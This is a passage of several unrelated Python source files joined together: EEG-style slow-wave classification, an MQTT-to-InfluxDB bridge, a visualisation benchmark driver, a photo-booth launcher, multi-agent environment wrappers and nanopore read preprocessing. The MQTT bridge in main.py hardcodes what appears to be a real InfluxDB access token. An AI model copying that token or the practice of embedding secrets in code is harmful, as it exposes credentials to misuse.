pos_np = np.asarray(pos).transpose()
self.s1.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
self.s2.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
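# Index mapping sketch (hypothetical numbers): predictions arrive flattened channel
# by channel, so with length == 3000 samples per channel a flat index of 6150 maps
# to [6150 / 3000, 6150 % 3000] == [2, 150], i.e. channel 2, sample 150.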
def process_data(self):
test_data = np.reshape(self.data, -1)
data = self.trainingData.plotDat[0][0:self.trainingData.plotLength]
events = self.trainingData.plotEvent[0][0:self.trainingData.plotLength]/5
Process(target=self.process_thread, args=(data, events)).start()
Process(target=self.process_thread, args=[test_data]).start()
def process_thread(self, data, event=None):
training_analyser = FeatureAnalyser()
# FeatureAnalyser requires the 1d data to be passed as array of an array
training_features = training_analyser.process_data([data])
if event is None:
output_name = cg.test_file_name
else:
output_name = cg.training_file_name
weka_write = WekaInterface(training_features, output_name)
weka_write.arff_write(event)
def analyse_internal(self):
self.s1.clear()
self.s2.clear()
# Deal with training data
data = self.trainingData.plotDat[0][0:self.trainingData.plotLength]
events = self.trainingData.plotEvent[0][0:self.trainingData.plotLength]/5
training_analyser = FeatureAnalyser()
training_features_training = training_analyser.process_data([data],(1,self.trainingData.plotLength))
# FeatureAnalyser requires the 1d data to be passed as array of an array
test_data_analyser = FeatureAnalyser()
# FeatureAnalyser requires the 1d data to be passed as array of an array
test_data = np.reshape(self.data, -1)
test_data_features = test_data_analyser.process_data([test_data], self.data.shape)
classifier = ClassifySlowWavesScikit()
prediction = classifier.classify_data(training_features_training, events, test_data_features)
diff = np.diff(prediction)
linear_at_uncorrected = np.array(np.where(diff == 1))
rows, cols = linear_at_uncorrected.shape
to_remove_index = []
for i in range(cols - 1):
if linear_at_uncorrected[0][i + 1] - linear_at_uncorrected[0][i] < 60:
to_remove_index.append(i + 1)
linear_at = np.delete(linear_at_uncorrected, to_remove_index)
pos = []
length = len(self.data[0])
sync_events = []
''' Check for sync events'''
for val in linear_at.transpose():
sync_events.append(int(val % length))
remove_sync_point = set([x for x in sync_events if sync_events.count(x) > 1])
print remove_sync_point
#remove_sync_point.clear()
''' Remove the sync events from the actual array'''
for val in linear_at.transpose():
if int(val % length) not in remove_sync_point:
pos.append([int(val/length), int(val % length)])
pos_np = np.asarray(pos).transpose()
print type(pos_np)
scipy.io.savemat(str('activation_points/') + str(cg.loaded_data_file)
+ str('_acti_points.mat'), dict(x=pos_np[1], y=pos_np[0]))
if pos_np.size == 0:
print "No events detected"
return
self.s1.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
self.s2.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
def save_trained(self):
with open(cg.trained_file, 'wb') as output:
pickle.dump(self.trainingData, output, pickle.HIGHEST_PROTOCOL)
def load_trained(self):
self.trainingData = np.load(cg.get_trained_file())
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
|
main.py
|
#!/usr/bin/env python3
import paho.mqtt.client as mqtt
import json
import time
import os, sys
import datetime as dt
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
from config.config import parse
import logging
import threading
logging.basicConfig(format='%(asctime)s -- %(levelname)s : %(funcName)s(ln:%(lineno)d) :: %(message)s')
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def on_connect(client, userdata, flags, rc):
""" The callback for when the client receives a CONNACK response from the server."""
logger.debug('Connected with result code ' + str(rc))
pass
def on_publish(client, userdata, result):
"""create function for callback"""
logger.debug("data published")
pass
def on_message(client, userdata, msg):
"""The callback for when a PUBLISH message is received from the server."""
logger.debug(msg.topic + ' ' + str(msg.payload))
my_json = msg.payload.decode('utf8').replace("'", '"')
if str(msg.topic).split("/")[0] == 'config':
logger.info("Config message received")
return
logger.info("Message received")
data = json.loads(my_json)
s = json.dumps(data, indent=4, sort_keys=True)
s = json.loads(s)
utc_dt = dt.datetime.now(dt.timezone.utc)
dtime = utc_dt.astimezone()
json_body = {
"measurement": s['measurement'],
"tags": s['tags'],
"fields": s['fields'],
"time": str(dtime)
}
write_api.write(bucket=bucket, record=Point.from_dict(json_body))
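# Payload sketch (hypothetical values, not part of the original script): on_message
# expects the MQTT payload to be a JSON object shaped like
#   {"measurement": "temperature", "tags": {"room": "lab"}, "fields": {"celsius": 21.4}}
# which is written to InfluxDB as a point stamped with the current local time.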
def main():
mqtt_client = mqtt.Client("mqtt-listener")
mqtt_client.username_pw_set(config["MQTT_USER"], config["MQTT_PASSWORD"])
mqtt_client.on_connect = on_connect
mqtt_client.on_message = on_message
mqtt_client.connect(config["MQTT_ADDRESS"], 1883, 60)
mqtt_client.subscribe(config["MQTT_TOPIC"])
mqtt_client.subscribe(config["MQTT_CONFIG_TOPIC"])
mqtt_client.loop_forever()
def pubber():
mqtt_client1 = mqtt.Client("mqtt-publisher")
mqtt_client1.username_pw_set(config["MQTT_USER"], config["MQTT_PASSWORD"])
mqtt_client1.connect(config["MQTT_ADDRESS"], 1883)
mqtt_client1.on_publish = on_publish
while True:
json_body = {
"measurement": "test",
"tags": {"test": "test"},
"fields": {"test": 1},
}
json_body = json.dumps(json_body, indent=4)
mqtt_client1.publish(config["MQTT_CONFIG_TOPIC"], json_body)
time.sleep(5)
if __name__ == '__main__':
logger.info('MQTT to InfluxDB bridge')
config = parse(config_section="TEST")
m = threading.Thread(target=pubber, daemon=True)
m.start()
bucket = "main"
db_client = InfluxDBClient(url=f"http://{config['InfluxDB_HOST']}:{config['InfluxDB_PORT']}",
token= "Z2ADB_tBwWNRlQaCNYB9DI8_Z49i4KXK6M0iHmlAuDtK2K8lSBvu7Szqc1XAT2Lk_Fkey7gkqUPeL5MtPV5Rwg==",
org='main')
write_api = db_client.write_api(write_options=SYNCHRONOUS)
query_api = db_client.query_api()
try:
main()
except KeyboardInterrupt:
logger.warning("Stopping")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
crossindex.py
|
import os
import queue
import time
import sys
import traceback
from threading import Thread
sys.path.extend(['/home/xty/pj/CrossIndex/crossindex'])
import pandas as pd
from common import util
from crossindex_main import CrossIndex
from crossindex_main import Query
class IDEBenchDriver:
def init(self, options, schema, driver_arg):
self.time_of_latest_request = 0
self.isRunning = False
self.requests = queue.LifoQueue()
# load cube
print("crossindex initialization")
print("table name: %s" % schema.get_fact_table_name())
print("crossindex name: %s" % driver_arg['name'])
print("crossindex dimensions: %s" % driver_arg['dimensions'])
print("crossindex types: %s" % driver_arg['types'])
print("crossindex cube-dir: %s" % driver_arg['cube_dir'])
print("crossindex method: %s" % driver_arg['method'])
self.crossindex = CrossIndex(driver_arg['name'], driver_arg['dimensions'], driver_arg['types'])
if os.path.exists(driver_arg['cube_dir'] + driver_arg['name'] + '_csv.csv'):
# self.crossindex.load(driver_arg['cube_dir'], driver_arg['name'])
self.crossindex.load_csv(driver_arg)
else:
raise Exception("no crossindex exist!")
self.method = driver_arg['method']
self.cached_q = Query(cube=self.crossindex)
# self.cnt = 0
# self.threshold = 4
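# driver_arg sketch (hypothetical values): init expects something like
#   {'name': 'flights', 'dimensions': ['carrier', 'dep_delay'],
#    'types': ['categorical', 'numeric'], 'cube_dir': '/data/cubes/',
#    'method': 'backward'}
# and loads the pre-built '<cube_dir><name>_csv.csv' file.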
def workflow_start(self):
self.isRunning = True
self.time_of_latest_request = 0
thread = Thread(target=self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
def process_request(self, viz_request, options, schema, result_queue):
self.requests.put((viz_request, options, schema, result_queue))
def process(self):
# while the workflow is running, pop the latest request from the stack and execute it
while self.isRunning:
try:
request = self.requests.get(timeout=1)
viz_request = request[0]
options = request[1]
schema = request[2]
result_queue = request[3]
# only execute requests that are newer than the last one we processed (drops old/no longer needed queries)
if viz_request.expected_start_time < self.time_of_latest_request:
viz_request.dropped = True
result_queue.put(viz_request)
continue
self.time_of_latest_request = viz_request.expected_start_time
self.execute_vizrequest(viz_request, options, schema, result_queue)
except Exception as ex:
# ignore queue-empty exceptions
traceback.print_exc()
pass
def execute_vizrequest(self, viz_request, options, schema, result_queue):
print("processsing...")
# print SQL translation of request and simulate query execution
sql_statement = viz_request.viz.get_computed_filter_as_sql(schema)
print(sql_statement)
q = Query(cube=self.crossindex)
q.parse(sql_statement)
# record start time
viz_request.start_time = util.get_current_ms_time()
if self.method == "direct":
res = self.direct_query(q)
elif self.method == "backward":
flag, res = self.backward_query(q)
viz_request.backward = flag
if res == 'dropped':
viz_request.dropped = True
# record end time
viz_request.end_time = util.get_current_ms_time()
# write an empty result to the viz_request
viz_request.result = {}
# notify IDEBench that processing is done by writing it to the result buffer
result_queue.put(viz_request)
def direct_query(self, q):
start = time.time()
res = self.crossindex.query_csv(q)
end = time.time()
print('direct query time:' + str(end - start))
return res
def backward_query(self, q):
start = time.time()
flag, res = self.crossindex.backward_query_csv(self.cached_q, q)
end = time.time()
print('backward query time:' + str(end - start))
# update cache
if not flag:
self.cached_q = q
return flag, res
|
greenie.py
|
"""
Configuration and launch of greenie GUI
"""
from glob import glob
import wx
import threading
import gui
import subprocess
import time
from os import path
#
# REQUIRED configuration
#
# list of directories containing foreground photos
photoDirs = ["/Users/someuser/Pictures/Eye-Fi"]
# directory containing background images
BGImagesDir = "/Users/someuser/greenie/backgrounds"
# directory in which to store generated compound images
CompoundImagesDir = "/Users/someuser/greenie/compound"
# directory in which to store a backup of all images that were sent to the printer
PrintedImagesDir = "/Users/someuser/greenie/printed"
# path to reference image, i.e. image of the empty green screen;
# by default the latest file in the folder containing reference images
referenceImage = glob("/Users/someuser/greenie/reference/*.[jJ][pP][gG]")[-1]
# printer name
PrinterName = "EPSON_XP_750_Series"
# printer options;
# here: paper source 3 (tray 2), landscape, fit to page, page size as given
PrinterOptions = ["-o", "EPIJ_FdSo=3", "-o", "landscape", "-o", "fit-to-page", "-o",
"PageSize=Custom.100x153mm", "-o", "EPIJ_Qual=46"]
#
# OPTIONAL configuration
#
# tolerance values for foreground masking, see greenscreen.Overlay for details
GreenScreenTol = [30., 40.]
# how often to poll the photoDirs for new photos
directoryPollingInterval = 1.0
#
# end of configuration
#
stopThreadsFlag = False
greenieGUI = None
greenieApp = None
def monitorPhotoDirs(callOnPresent=True):
"""
Monitor directories for new image files, calling greenieGUI.AddFGImage on each new file path.
If 'callOnPresent' is True, AddFGImage is initially called for all files already present.
"""
previous = []
for d in photoDirs:
previous += glob(path.join(d, "*.[jJ][pP][gG]"))
if callOnPresent:
for f in previous:
greenieGUI.AddFGImage(f)
greenieGUI.RefreshGUI()
while not stopThreadsFlag:
time.sleep(directoryPollingInterval)
current = []
for d in photoDirs:
current += glob(path.join(d, "*.[jJ][pP][gG]"))
added = [f for f in current if f not in previous]
if len(added) > 0:
for f in added:
greenieGUI.AddFGImage(f)
previous = current
greenieGUI.RefreshGUI()
if __name__ == '__main__':
# set default printer
subprocess.check_call(["lpoptions", "-d", PrinterName])
# build and start GUI
greenieApp = wx.App()
greenieGUI = gui.GreenieGUI(BGImagesDir=BGImagesDir,
CompoundImagesDir=CompoundImagesDir,
PrintedImagesDir=PrintedImagesDir,
ReferenceImage=referenceImage,
PrinterOptions=PrinterOptions,
GreenScreenTol=GreenScreenTol)
greenieGUI.Show()
# start monitoring photo directories
threadFSMonitor = threading.Thread(target=monitorPhotoDirs, args=(True,))
threadFSMonitor.start()
# start GUI main loop
greenieApp.MainLoop()
# on return, the app has closed
stopThreadsFlag = True
pass
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
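# Protocol sketch (illustrative, not part of the original module): each worker owns
# one env and serves commands sent over its Pipe end, e.g.
#   remote.send(('step', actions))      -> (ob, reward, done, info)
#   remote.send(('reset', None))        -> ob
#   remote.send(('get_spaces', None))   -> (observation_space, action_space)
#   remote.send(('close', None))        -> worker closes its end and exits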
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
# print(obs)
# print(rews)
# print(dones)
# print(infos)
# print('*'*10)
# envs here should always contain exactly one element; this change is meant to pass infos through directly
# result = self.envs[0].step(self.actions[0])
# obs, rews, dones, infos = \
# [np.array(result[0])],\
# [np.array(result[1])],\
# [np.array(result[2])],\
# [result[3]]
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def close(self):
return
|
_preprocess.py
|
from __future__ import division, unicode_literals, absolute_import
from builtins import int, range, dict, map, zip
import io
import os
import re
import sys
import queue
# Future warning from cython in h5py
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import h5py
from tqdm import tqdm
from time import sleep
from itertools import islice
from multiprocessing import Process, Queue, Pipe
if sys.version_info[0] > 2:
unicode = str
from . import tombo_helper as th
VERBOSE = True
_MAX_QUEUE_SIZE = 1000
_ITER_QUEUE_LIMIT = 1000
_PROC_UPDATE_INTERVAL = 100
_MAX_FASTQ_QUEUE_SIZE = 10000
_SEQ_SUMMARY_FN_FIELD = 'filename'
_SEQ_SUMMARY_ID_FIELD = 'read_id'
# warning messages for annotate with fastqs over multiple processes,
# requiring passing warning codes to only print warning once.
_WARN_ID_VAL = 'ids'
_WARN_IO_VAL = 'io'
_WARN_MISMATCH_VAL = 'mismatch'
_WARN_OVRWRT_VAL = 'overwrite'
_WARN_UNIQ_VAL = 'uniq'
_WARN_CODES = (_WARN_ID_VAL, _WARN_IO_VAL, _WARN_MISMATCH_VAL, _WARN_OVRWRT_VAL)
_WARN_CODES_PREP = (_WARN_OVRWRT_VAL, _WARN_UNIQ_VAL)
_WARN_PREFIX = '****** WARNING ****** '
##########################
###### Annotate Raw ######
##########################
def _prep_fast5_for_fastq(fast5_data, bc_grp_name, bc_subgrp_name, overwrite):
#print("there")
read_id = th.get_raw_read_slot(fast5_data).attrs.get('read_id')
try:
read_id = read_id.decode()
except (AttributeError, TypeError):
pass
#print(read_id,fast5_data.filename.split("_")[-4:])
sp = fast5_data.filename.split("_")[-4:]
read_id="ch%s_read%s"%(sp[-2],sp[-4])
#print(read_id)
if read_id is None:
return
# if Analyses group doesn't exist yet, create it
try:
analyses_grp = fast5_data['/Analyses']
except:
try:
analyses_grp = fast5_data.create_group('Analyses')
except:
print("Probably No permission to write")
# create Fastq slot, unless value exists and --overwrite is not set
try:
bc_grp = analyses_grp[bc_grp_name]
bc_subgrp = analyses_grp[bc_subgrp_name]
except:
try:
bc_grp = analyses_grp.create_group(bc_grp_name)
bc_subgrp = bc_grp.create_group(bc_subgrp_name)
except:
if overwrite:
del analyses_grp[bc_grp_name]
bc_grp = analyses_grp.create_group(bc_grp_name)
bc_subgrp = bc_grp.create_group(bc_subgrp_name)
else:
raise th.TomboError(
bc_grp_name + ' exists and --overwrite is not set.')
return read_id
def _annotate_with_fastqs_worker(
fastq_rec_q, fast5s_read_ids, fastq_slot, fq_slot_prepped,
prog_q, warn_q, bc_grp_name, bc_subgrp_name, overwrite):
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES)
num_recs_proc = 0
#print(fast5s_read_ids)
while True:
fastq_rec = fastq_rec_q.get()
if fastq_rec is None:
break
# extract read_id from fastq (which should be the first text after
# the "@" record delimiter up to the first white space or underscore
read_id = "_".join(fastq_rec[0].split()[0].split('_')[:2])[1:]
#print("annotate ",read_id)
#print(fast5s_read_ids)
if read_id not in fast5s_read_ids:
#print("Not found")
if not been_warned[_WARN_ID_VAL]:
been_warned[_WARN_ID_VAL] = True
warn_q.put(_WARN_ID_VAL)
continue
#print("Faound",fastq_rec)
try:
with h5py.File(fast5s_read_ids[read_id], 'r+') as fast5_data:
if not fq_slot_prepped:
try:
file_parsed_id = _prep_fast5_for_fastq(
fast5_data, bc_grp_name, bc_subgrp_name, overwrite)
except th.TomboError:
if not been_warned[_WARN_OVRWRT_VAL]:
been_warned[_WARN_OVRWRT_VAL] = True
warn_q.put(_WARN_OVRWRT_VAL)
continue
if read_id != file_parsed_id:
if not been_warned[_WARN_MISMATCH_VAL]:
been_warned[_WARN_MISMATCH_VAL] = True
warn_q.put(_WARN_MISMATCH_VAL)
continue
bc_slot = fast5_data[fastq_slot]
# add sequence to fastq slot
bc_slot.create_dataset(
'Fastq', data=''.join(fastq_rec),
dtype=h5py.special_dtype(vlen=unicode))
# progress q update
num_recs_proc += 1
if num_recs_proc % _PROC_UPDATE_INTERVAL == 0:
prog_q.put(_PROC_UPDATE_INTERVAL)
except:
if not been_warned[_WARN_IO_VAL]:
been_warned[_WARN_IO_VAL] = True
warn_q.put(_WARN_IO_VAL)
continue
# add last number of records reported from this process
prog_q.put(num_recs_proc % _PROC_UPDATE_INTERVAL)
return
def _feed_seq_records_worker(fastq_fns, fastq_rec_q, num_processes):
for fastq_fn in fastq_fns:
n_recs = 0
with io.open(fastq_fn) as fastq_fp:
while True:
fastq_rec = list(islice(fastq_fp, 4))
# if record contains fewer than 4 lines this indicates the
# EOF, so move to next file
if len(fastq_rec) != 4: break
# if sequence identifier line does not start with "@" or quality
# score line does not start with a "+" the file may be
# corrupted, so don't process any more records
if (re.match('@', fastq_rec[0]) is None or
re.match('\+', fastq_rec[2]) is None):
# TODO maybe send this as a warning code to avoid poorly
# formatted output
th.warning_message(
'Successfully parsed ' + unicode(n_recs) +
' FASTQ records from ' + fastq_fn + ' before ' +
'encountering an invalid record. The rest of ' +
'this file will not be processed.')
break
n_recs += 1
fastq_rec_q.put(fastq_rec)
# put none records to trigger annotation processes to exit
for _ in range(num_processes):
fastq_rec_q.put(None)
return
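# Record sketch (illustrative): a well-formed FASTQ record spans four lines, e.g.
#   @8e3a1f22_ch123_read45
#   ACGTACGT
#   +
#   !''*((((
# islice(fastq_fp, 4) pulls one such record per iteration; a short or malformed
# record stops processing of that file.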
def _get_ann_queues(prog_q, warn_q, num_read_ids, wp_conn):
if VERBOSE: bar = tqdm(total=num_read_ids, smoothing=0)
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES)
def update_warn(warn_val):
if warn_val == _WARN_ID_VAL:
if VERBOSE and not been_warned[_WARN_ID_VAL]:
bar.write(
_WARN_PREFIX + 'Some FASTQ records contain read ' +
'identifiers not found in any FAST5 files or ' +
'sequencing summary files.',
file=sys.stderr)
been_warned[_WARN_ID_VAL] = True
elif warn_val == _WARN_IO_VAL:
if VERBOSE and not been_warned[_WARN_IO_VAL]:
bar.write(
_WARN_PREFIX + 'Some read files could not be accessed.',
file=sys.stderr)
been_warned[_WARN_IO_VAL] = True
elif warn_val == _WARN_MISMATCH_VAL:
if VERBOSE and not been_warned[_WARN_MISMATCH_VAL]:
bar.write(
_WARN_PREFIX + 'Read ID(s) found in sequencing summary ' +
'and FAST5 file are discordant. Skipping such reads.',
file=sys.stderr)
been_warned[_WARN_MISMATCH_VAL] = True
elif warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(
_WARN_PREFIX + 'Basecalls exist in specified slot for ' +
'some reads. Set --overwrite option to overwrite these ' +
'basecalls.', file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
if VERBOSE: bar.write(
_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
return
total_added_seqs = 0
while True:
try:
iter_added = prog_q.get(block=False)
total_added_seqs += iter_added
if VERBOSE: bar.update(iter_added)
except queue.Empty:
try:
warn_val = warn_q.get(block=False)
update_warn(warn_val)
except queue.Empty:
sleep(0.1)
# check if main thread has finished with all fastq records
if wp_conn.poll():
break
# collect all remaining warn and progress values
while not prog_q.empty():
iter_added = prog_q.get(block=False)
total_added_seqs += iter_added
if VERBOSE: bar.update(iter_added)
while not warn_q.empty():
warn_val = warn_q.get(block=False)
update_warn(warn_val)
if VERBOSE:
bar.close()
th.status_message('Added sequences to a total of ' +
str(total_added_seqs) + ' reads.')
if total_added_seqs < num_read_ids:
th.warning_message(
'Not all read ids from FAST5s or sequencing summary files ' +
'were found in FASTQs.\n\t\tThis can result from reads that ' +
'failed basecalling or if full sets of FAST5s/sequence ' +
'summaries are not processed with full sets of FASTQs.')
return
def _annotate_with_fastqs(
fastq_fns, fast5s_read_ids, fastq_slot, fq_slot_prepped, num_processes,
bc_grp_name, bc_subgrp_name, overwrite):
if VERBOSE: th.status_message('Annotating FAST5s with sequence from FASTQs.')
fastq_rec_q = Queue(maxsize=_MAX_FASTQ_QUEUE_SIZE)
prog_q = Queue()
warn_q = Queue()
# open a single process to read fastq files and feed the fastq record queue
fq_feed_p = Process(target=_feed_seq_records_worker,
args=(fastq_fns, fastq_rec_q, num_processes))
fq_feed_p.daemon = True
fq_feed_p.start()
# open fast5 annotation processes
ann_args = (fastq_rec_q, fast5s_read_ids, fastq_slot, fq_slot_prepped,
prog_q, warn_q, bc_grp_name, bc_subgrp_name, overwrite)
ann_ps = []
for p_id in range(num_processes):
ann_p = Process(target=_annotate_with_fastqs_worker, args=ann_args)
ann_p.daemon = True
ann_p.start()
ann_ps.append(ann_p)
main_wp_conn, wp_conn = Pipe()
warn_prog_p = Process(target=_get_ann_queues,
args=(prog_q, warn_q, len(fast5s_read_ids), wp_conn))
warn_prog_p.daemon = True
warn_prog_p.start()
fq_feed_p.join()
for ann_p in ann_ps:
ann_p.join()
# send signal to warn/progress queue that all other processes are complete
main_wp_conn.send(True)
warn_prog_p.join()
return
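# Process/queue topology set up by _annotate_with_fastqs (summary for orientation;
# arrows are illustrative):
#
#   _feed_seq_records_worker --fastq_rec_q--> N x _annotate_with_fastqs_worker
#   _annotate_with_fastqs_worker --prog_q / warn_q--> _get_ann_queues (progress bar, warnings)
#   main process --Pipe(main_wp_conn, wp_conn)--> _get_ann_queues (signals completion)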
##########################
#### Extract read_ids ####
##########################
def _get_prep_queue(read_ids_q, prog_q, warn_q, gp_conn, num_fast5s):
"""Process all records from all fast5 prep queues
"""
ovrwrt_mess = (
_WARN_PREFIX + 'Basecalls exist in the specified slot for some ' +
'reads. Set --overwrite option to overwrite these basecalls.')
fast5s_read_ids = {}
# Warn about non-unique read_ids in the directory
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES_PREP)
if VERBOSE: bar = tqdm(total=num_fast5s, smoothing=0)
while True:
try:
read_id, fast5_fn = read_ids_q.get(block=False)
if read_id in fast5s_read_ids:
if VERBOSE and not been_warned[_WARN_UNIQ_VAL]:
bar.write(
_WARN_PREFIX + 'Multiple FAST5 files contain the ' +
'same read ID. Ensure that FAST5 files are from a ' +
'single run.', file=sys.stderr)
been_warned[_WARN_UNIQ_VAL] = True
continue
fast5s_read_ids[read_id] = fast5_fn
except queue.Empty:
try:
warn_val = warn_q.get(block=False)
if warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(ovrwrt_mess, file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
bar.write(_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
except queue.Empty:
try:
if VERBOSE: bar.update(prog_q.get(block=False))
except queue.Empty:
sleep(0.1)
# check if main thread has finished with all FAST5s
if gp_conn.poll():
break
while not read_ids_q.empty():
read_id, fast5_fn = read_ids_q.get(block=False)
fast5s_read_ids[read_id] = fast5_fn
while not warn_q.empty():
warn_val = warn_q.get(block=False)
if warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(ovrwrt_mess, file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
bar.write(_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
while not prog_q.empty():
if VERBOSE: bar.update(prog_q.get(block=False))
if VERBOSE: bar.close()
gp_conn.send(fast5s_read_ids)
return
def _prep_fastq_slot_worker(
fast5_q, bc_grp, bc_subgrp, overwrite, read_ids_q, prog_q, warn_q):
num_files_proc = 0
been_warned_overwrite = False
while True:
try:
fast5_fn = fast5_q.get(block=False)
except queue.Empty:
sleep(0.1)
continue
if fast5_fn is None:
break
num_files_proc += 1
if num_files_proc % _PROC_UPDATE_INTERVAL == 0:
prog_q.put(_PROC_UPDATE_INTERVAL)
try:
with h5py.File(fast5_fn) as fast5_data:
try:
read_id = _prep_fast5_for_fastq(
fast5_data, bc_grp, bc_subgrp, overwrite)
except th.TomboError:
# avoid the warn queue growing too large by sending at most one
# overwrite warning per worker process
if not been_warned_overwrite:
been_warned_overwrite = True
warn_q.put(_WARN_OVRWRT_VAL)
continue
except:
continue
if read_id is None:
continue
read_ids_q.put((read_id, fast5_fn))
prog_q.put(num_files_proc % _PROC_UPDATE_INTERVAL)
return
def _fill_files_queue(fast5_q, fast5_fns, num_ps):
for fast5_fn in fast5_fns:
fast5_q.put(fast5_fn)
for _ in range(num_ps):
fast5_q.put(None)
return
def _get_read_ids_and_prep_fastq_slot(
fast5s_dir, bc_grp, bc_subgrp, overwrite, num_processes):
"""Extract read id from /Raw group and prep fastq slots for annotation with
associated FASTQ files.
"""
if VERBOSE: th.status_message(
'Preparing reads and extracting read identifiers.')
fast5_q = Queue(maxsize=_MAX_QUEUE_SIZE)
read_ids_q = Queue()
prog_q = Queue()
warn_q = Queue()
fast5_fns = th.get_files_list(fast5s_dir)
files_p = Process(target=_fill_files_queue,
args=(fast5_q, fast5_fns, num_processes))
files_p.daemon = True
files_p.start()
prep_args = (fast5_q, bc_grp, bc_subgrp, overwrite, read_ids_q,
prog_q, warn_q)
prep_ps = []
for p_id in range(num_processes):
prep_p = Process(target=_prep_fastq_slot_worker, args=prep_args)
prep_p.daemon = True
prep_p.start()
prep_ps.append(prep_p)
main_gp_conn, gp_conn = Pipe()
get_prep_p = Process(
target=_get_prep_queue,
args=(read_ids_q, prog_q, warn_q, gp_conn, len(fast5_fns)))
get_prep_p.daemon = True
get_prep_p.start()
# join all processes into the main thread
files_p.join()
for prep_p in prep_ps:
prep_p.join()
# send signal to get_prep queue that all other processes are complete
main_gp_conn.send(True)
fast5s_read_ids = main_gp_conn.recv()
return fast5s_read_ids
def _parse_sequencing_summary_files(fast5s_dir, seq_summary_fns):
if VERBOSE: th.status_message('Getting read filenames.')
full_fast5_fns = {}
# walk through directory structure searching for fast5 files
for root, _, fns in os.walk(fast5s_dir):
for fn in fns:
if not fn.endswith('.fast5'): continue
full_fast5_fns[fn] = os.path.join(root, fn)
if VERBOSE: th.status_message('Parsing sequencing summary files.')
fast5s_read_ids = {}
been_warned = False
for seq_summary_fn in seq_summary_fns:
with open(seq_summary_fn) as fp:
try:
header_fields = fp.readline().split()
fn_field = next(i for i, h_field in enumerate(header_fields)
if re.match(_SEQ_SUMMARY_FN_FIELD, h_field))
id_field = next(i for i, h_field in enumerate(header_fields)
if re.match(_SEQ_SUMMARY_ID_FIELD, h_field))
except:
th.warning_message(
'Could not extract header information for sequencing ' +
'summary file: ' + seq_summary_fn)
continue
